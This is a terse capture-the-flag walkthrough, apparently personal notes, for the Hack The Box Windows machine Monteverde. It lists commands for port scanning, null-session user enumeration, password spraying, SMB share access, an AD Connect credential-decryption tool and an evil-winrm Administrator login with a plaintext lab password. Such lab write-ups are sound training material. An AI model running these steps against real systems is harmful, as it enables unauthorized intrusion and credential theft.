Avatar Pwned machines

Monteverde

Monteverde


Created by Page Difficulty OS
egre55 Hack The Box Medium Windows

nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.172 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49673,49674,49676,49696 -sCV -Pn 10.10.10.172 -oN ports

image

dig @10.10.10.172 MEGABANK.LOCAL mx

image

rpcclient -U "" -N 10.10.10.172
	enumdomusers
netexec smb 10.10.10.172 -u users -p users --continue-on-success
smbclient -U 'SABatchJobs'  \\\\10.10.10.172\\users$ 

image

image

image

C:\Windows\temp\AdDecrypLexe -FullSQL

image

evil-winrm -i  10.10.10.172 -u Administrator -p 'd0m@in4dminyeah!'